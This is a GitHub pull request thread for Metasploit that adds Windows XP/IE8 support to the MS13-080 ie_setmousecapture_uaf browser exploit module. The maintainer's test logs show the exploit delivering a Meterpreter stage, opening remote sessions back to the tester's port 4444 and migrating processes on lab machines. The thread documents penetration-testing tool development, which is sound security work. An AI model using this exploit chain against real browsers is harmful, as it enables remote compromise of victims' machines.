New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

win XP IE8 exploit for MS13-080 #4213

Merged
merged 2 commits into from Dec 3, 2014

Conversation

Projects
None yet
3 participants
@webstersprodigy
Contributor

webstersprodigy commented Nov 15, 2014

ie_setmousecapture_uaf only supported IE9 on windows 7, but the vuln was present in different versions of IE. I tested with Windows xp sp3 and IE8 and the exploit works pretty reliably (included the specific mshtml version in the code). I did not test that I did not break the win7 IE9 exploit as I didn't have that setup (but there shouldn't be anything changed)

This pull request is probably not very useful in real life - I was just messing around.

@wchen-r7 wchen-r7 added the module label Nov 16, 2014

@wchen-r7 wchen-r7 self-assigned this Nov 16, 2014

@todb-r7 todb-r7 added the feature label Nov 17, 2014

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Nov 22, 2014

Contributor

I have not forgotten this PR. Want to do this but occupied with other stuff atm.

Contributor

wchen-r7 commented Nov 22, 2014

I have not forgotten this PR. Want to do this but occupied with other stuff atm.

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Dec 3, 2014

Contributor

Tested:

IE9:

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://0.0.0.0:8080/mtAFOHcX6lJL
[*]  Local IP: http://10.6.0.118:8080/mtAFOHcX6lJL
[*] Server started.
[*] 10.6.0.209       ie_setmousecapture_uaf - Gathering target information.
[*] 10.6.0.209       ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 10.6.0.209
[*] Meterpreter session 1 opened (10.6.0.118:4444 -> 10.6.0.209:49203) at 2014-12-03 13:43:56 -0600
[*] Session ID 1 (10.6.0.118:4444 -> 10.6.0.209:49203) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (2420)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1088
[+] Successfully migrated to process 

msf exploit(ie_setmousecapture_uaf) >

IE8 (XP):

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://172.16.23.1:8080/AcUinEiHgAWdsWM
[*] Server started.
[*] 172.16.23.129    ie_setmousecapture_uaf - Gathering target information.
[*] 172.16.23.129    ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 172.16.23.129
[*] Meterpreter session 3 opened (172.16.23.1:4444 -> 172.16.23.129:1951) at 2014-12-03 14:10:42 -0600
[*] Session ID 3 (172.16.23.1:4444 -> 172.16.23.129:1951) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2252
[+] Successfully migrated to process 
Contributor

wchen-r7 commented Dec 3, 2014

Tested:

IE9:

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://0.0.0.0:8080/mtAFOHcX6lJL
[*]  Local IP: http://10.6.0.118:8080/mtAFOHcX6lJL
[*] Server started.
[*] 10.6.0.209       ie_setmousecapture_uaf - Gathering target information.
[*] 10.6.0.209       ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 10.6.0.209
[*] Meterpreter session 1 opened (10.6.0.118:4444 -> 10.6.0.209:49203) at 2014-12-03 13:43:56 -0600
[*] Session ID 1 (10.6.0.118:4444 -> 10.6.0.209:49203) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (2420)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1088
[+] Successfully migrated to process 

msf exploit(ie_setmousecapture_uaf) >

IE8 (XP):

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://172.16.23.1:8080/AcUinEiHgAWdsWM
[*] Server started.
[*] 172.16.23.129    ie_setmousecapture_uaf - Gathering target information.
[*] 172.16.23.129    ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 172.16.23.129
[*] Meterpreter session 3 opened (172.16.23.1:4444 -> 172.16.23.129:1951) at 2014-12-03 14:10:42 -0600
[*] Session ID 3 (172.16.23.1:4444 -> 172.16.23.129:1951) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2252
[+] Successfully migrated to process 

wchen-r7 added a commit to wchen-r7/metasploit-framework that referenced this pull request Dec 3, 2014

Resolve merge conflict for ie_setmousecapture_uaf (#4213)
Conflicts:
	modules/exploits/windows/browser/ie_setmousecapture_uaf.rb

@wchen-r7 wchen-r7 merged commit 27d5ed6 into rapid7:master Dec 3, 2014

1 check passed

continuous-integration/travis-ci The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Dec 3, 2014

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment